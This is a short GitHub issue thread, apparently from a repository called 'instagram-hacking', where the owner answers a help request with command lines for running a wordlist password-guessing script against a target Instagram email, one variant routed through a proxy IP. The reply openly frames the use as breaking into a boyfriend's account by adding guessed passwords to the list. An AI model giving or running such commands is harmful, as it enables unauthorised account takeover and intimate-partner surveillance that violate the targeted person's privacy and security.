### ISSUE TITLE
Please help

### ISSUE THREAD

**Issue by norinalin** [chfncghn/instagram-hacking#2]

**Comment by chfncghn** [comment]
Hello you can use our instagram hacking in your Windows, Mac or Linux computer (you have to install python3 first)
then type the below command
python3 instagram_hack.py -t freindemail@gmail.com -w pass.txt 

If the above code didn't work try this also
python3 instagram_hack.py -t freindemail@gmail.com -w pass.txt -p 144.217.101.245:3129

If you are thinking that your boyfriend may use a password edit the pass.txt that password you suggest
